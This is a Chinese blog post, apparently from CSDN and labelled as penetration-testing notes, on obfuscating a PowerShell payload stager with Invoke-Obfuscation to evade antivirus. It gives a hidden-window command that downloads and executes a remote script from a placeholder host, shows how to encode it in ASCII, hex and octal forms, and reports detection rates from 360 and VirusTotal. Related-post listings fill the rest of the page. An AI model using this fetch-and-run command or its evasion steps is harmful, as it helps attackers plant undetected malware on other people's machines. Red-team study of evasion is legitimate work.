【渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】

已于 2022-06-30 18:15:38 修改
阅读量1.8k 收藏 5
点赞数 1
分类专栏: 渗透测试 免杀 文章标签: 渗透测试
于 2021-07-06 17:30:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44874645/article/details/118521756
版权

0x01 项目地址

https://github.com/danielbohannon/Invoke-Obfuscation

0x02 用法

  1. 生成powershell:
    在这里插入图片描述
    在这里插入图片描述
powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"
  1. 下载并用powershell进入项目目录执行:Import-Module .\Invoke-Obfuscation.psd1;Invoke-Obfuscation
    如果报错请先执行:Set-ExecutionPolicy Unrestricted
    在这里插入图片描述
  2. 输入要混淆的PS:set scriptblock 'powershell.exe -nop -w hidden -c "IEX ((new-object net.webclient).downloadstring('http://x.x.x.x:80/b'))"'
    (设置ps文件:set scriptpath C:\0_poweshell\msf-crow.ps1
    在这里插入图片描述
  3. 输入ENCODING选择要编码的方式:
    在这里插入图片描述

0x03 编码测试

1. ASCII

  1. 选择1:
    在这里插入图片描述

  2. 输出:out PowerShellCodeASCII.ps1
    在这里插入图片描述

  3. 免杀与上线测试

  • 360静态查杀:
    在这里插入图片描述
  • 360动态查杀:
    在这里插入图片描述
    在这里插入图片描述
  • VT:5/58
    在这里插入图片描述

2. Hex

  1. undo 撤销上次命令:
    在这里插入图片描述

  2. 编码并输出:
    在这里插入图片描述

  3. 免杀与上线测试

  • 360静态查杀:
    在这里插入图片描述

  • 360动态查杀:
    在这里插入图片描述
    在这里插入图片描述

  • VT:9/59
    在这里插入图片描述

3. Octal

  1. 编码并输出:
    在这里插入图片描述

  2. 免杀与上线测试

  • 360静态查杀:
    在这里插入图片描述

  • 360动态查杀:
    在这里插入图片描述
    在这里插入图片描述

  • VT:7/58在这里插入图片描述

不再赘述。。。

AA8j
关注
  • 1
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
AerYinan的博客
01-12 9661
利用Invoke-Obfuscation混淆ps文件实现上线/VT免杀率3/55
powershell的一次免杀
Hungchuiho的博客
11-20 4227
powershell介绍 powershell是一个基于.Net的shell和脚本语言,它可以帮助管理员进行一些自动化的操作,Windows 7及以上的操作系统默认安装,同时它是支持跨平台的!一旦攻击者可以在一台计算机 上运行代码,他们就会下载PowerShel脚本文件(.ps1) 到磁盘中执行,甚至无须写到磁盘中执行,它可以直接在内存中运行,可以理解为PowerShell 是 cmd 的加强版。 powershell存在六种执行策略: Unrestricted 权限最高,可以不受限制执行任意脚本 Rest
Invoke-Obfuscation(psh代码混淆)
不知名白帽的博客
08-11 794
Invoke-Obfuscation(psh代码混淆)
渗透测试笔记】之【免杀工具——使用Invoke-Obfuscation代码混淆免杀powershell】_yetanotherobfuscator(2)
最新发布
2401_84969291的博客
05-13 408
自我介绍一下,小编13年上海交大毕业,曾经在小公司待过,也去过华为、OPPO等大厂,18年进入阿里一直到现在。深知大多数网络安全工程师,想要提升技能,往往是自己摸索成长,但自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《2024年网络安全全套学习资料》,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友。既有适合小白学习的零基础资料,也有适合3年以上经验的小伙伴深入学习提升的进阶课程,基本涵盖了95%以上网络安全知识点!真正的体系化!
PowerShell木马免杀利器: Invoke-Obfuscation(过火绒)
xf555er的博客
01-07 2212
Invoke-Obfuscation工具下载地址: https://github.com/danielbohannon/Invoke-ObfuscationInvoke-Obfuscation是一款PowerShell混淆工具,可以将PowerShell脚本加密,使得它的检测和分析变得更加困难。该工具包含多种加密方法,可以单独使用也可以结合使用,以提高混淆的效果。
Ladon九种PowerShell命令混淆加密免杀方法
K8哥哥
11-02 1686
九种方式随机混淆PowerShell代码,防止管理员轻易还原,至少比默认明文或Base64隐蔽。 Base64就不说了是个人都能解,一是常用,二是工具多,管理员懂解很正常,所以不推荐。 Ladon提供的混淆方法,每点一次按钮就随机会生成不同的命令,但是执行的都是同个功能 管理员想反查就得每一条都研究如何解密,给管理员增加难度,就是给自己增加控制时间。 更新功能 GUI 2020.10.18 [+] PowerShellEXEEXEPowerShell EXE->Powershell PowerS
Invoke-Obfuscation-Bypass + PS2EXE 绕过主流杀软1
08-03
在描述中提到,通过将 Invoke-Obfuscation 应用到 C# 生成的 PowerShell 脚本上,然后使用 PS2EXE 工具将其转换为exe文件,可以有效地绕过某些主流杀软的检测。例如,在测试过程中,混淆后的脚本不再被某60云查杀和...
invoke-atomicredteam:Invoke-AtomicRedTeam是一个PowerShell模块,用于执行[atomics文件夹](https
04-30
Invoke-AtomicRedTeam是一个PowerShell模块,用于执行Red Canary的Atomic Red Team项目的中定义的测试。 “ atomics文件夹”包含定义的每种技术的文件夹。 在每个“ T#”文件夹中,您都会找到一个yaml文件,该文件...
PowerShell使用curl(Invoke-WebRequest)的方法教程
01-10
PowerShell能干什么呢?PowerShell首先是个Shell,定义好了一堆命令与操作系统,特别是与文件系统交互,能够启动应用程序,甚至操纵应用程序;第二,PowerShell允许将几个命令组合起来放到文件里执行,实现文件级的...
2020.04-远控免杀从入门到实践(6)-代码篇-Powershell1
08-03
在这里,我们将讨论使用 Powershell 实现免杀的技术,包括使用 Invoke-Shellcode、Invoke-Obfuscation 等技术来躲避安全软件和防火墙的检测。 4. Powershell 的安全风险 Powershell 是一个功能强大的 ...
一个强大的免费c#.Net混淆器 CSharpFuscator
11-30
一个强大的免费c#.Net混淆器 CSharpFuscator
Invoke-Obfuscation:一款功能强大的PowerShell代码混淆工具
qq_53058639的博客
07-29 216
外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-fyOoLh6y-1690608873080)(data:image/gif;[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-b1JMsAWY-1690608873081)(data:image/gif;[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-ALyXvPFo-1690608873083)(data:image/gif;因此,Invoke-
invoke-obfuscation使用遇到的问题及Encoding免杀
Croil的博客
12-25 2005
简单的invoke-obfuscation使用
Invoke-Obfuscation
weixin_44216796的博客
01-16 2378
导入项目: Import-Module ./Invoke-Obfuscation.psd1 Invoke-Obfuscation 支持的加密功能列表 TOKEN支持分部分混淆 STRING整条命令混淆 COMPRESS将命令转为单行并压缩, ENCODING编码 LAUNCHER选择执行方式。 使用 set scriptpath C:\Users\Administrator\Desktop\payload.ps1 encoding 1 out x.ps1 powershell -windowsty
Powershell免杀系列(二)
st3pby的博客
02-20 3202
技术交流 关注微信公众号 Z20安全团队 , 回复 加群 ,拉你入群 一起讨论技术。 直接公众号文章复制过来的,排版可能有点乱, 可以去公众号看。 正文 powershell免杀⽅法有很多,对代码进⾏编码是最常⻅的⼀种,这⾥介绍⼀个专⻔⽤来对powershell进⾏编码免杀的框架Invoke-Obfuscation,这也是著名的APT32组织海莲花常⽤的⼀个⼯具。 该工具可以对powershell代码进行 ASCII/hex/octal/binary/SecureS...
一个简单好用的内网渗透免杀工具免杀 fscan,mimikatz,frp 等】
资深程序员,曾自学JAVA,C#,如今从业于网安行业
01-02 1378
一个简单内网渗透工具免杀 目前免杀fscan、mimikatz、frp、elevationstation、bypassuac、 一键killAV。请使用In-Swor(x64版本),360报毒qvm20请更换exe图标资源。
免杀工具 -- FourEye
weixin_41489908的博客
01-12 6846
今天有一点想你,其实,不止一点,其实,不止今天。。。 ​----网易云热评 一、简介 快速生成免杀exe可执行文件,目前拥有三种免杀的方法 二、下载及安装 1、下载到本地 git clonehttps://github.com/lengjibo/FourEye.git 2、进入该文件夹 cd FourEye 3、安装需要的python库 pip install -r requirements.txt 三、使用方法 1、打开该软件 python3 Byp...
一个简单好用的内网渗透免杀工具,可免杀 fscan,mimikatz,frp 等等。
logic1001的博客
12-29 1499
内容概要:包括 内网、操作系统、协议、渗透测试、安服、漏洞、注入、XSS、CSRF、SSRF、文件上传、文件下载、文件包含、XXE、逻辑漏洞、工具、SQLmap、NMAP、BP、MSF…技术文档也是我自己整理的,包括我参加大型网安行动、CTF和挖SRC漏洞的经验和技术要点,电子书也有200多本,由于内容的敏感性,我就不一一展示了。网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
免杀测试】Kali之Metasploit几款工具免杀练习
小司机的奥拓
12-25 1423
余磊不知攻,焉知防。作为渗透测试攻城狮,实战之前要做大量的攻防练习。一般黑客拿到主机的shell之后,需要留后门方便进行下一步的渗透。普通的木马已经很容易被查杀工具识别,这时就催生出了免杀技术来绕过杀毒软件。下面就尝试测试有关工具免杀效果,三款工具为,shellter,Veil, Avet01shellterShellter采用了动态Shellcode注入来实现免杀的效果,当用户打开被植入后门的软件时,只有触发一定的操作才会启动后门。它是生成一个dll文件再将其注入到任意一个文件中运行。
Invoke-WebRequest 上传文件
07-11
续改进:基于关键业务指标,进行数据分析和评估,发现问题和改进机会你可以使用 PowerShell 中的 `Invoke-WebRequest` 命令来上传文件。以下是一个示例: ```powershell $uri,并持续优化机器人回访流程和服务,以不断提升业务运营效果。 通过基 = "http://example.com/upload" # 替换为你要上传文件的目标 URL $file = "C:\path\to\file.ext" # 替换为你要上传的文件的路径 Invoke-WebRequest -Uri $uri -Method POST -InFile $file ``` 在上面的示例中,你需要将 `$uri` 替换为你要上传文件的于关键业务指标的运营方案设计和持续改进,可以提高智能回访机器人目标 URL,将 `$file` 替换为你要上传的文件的路径。然后,`Invoke-WebRequest` 命令将使用 POST 方法将文件上传到指定的 URL。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值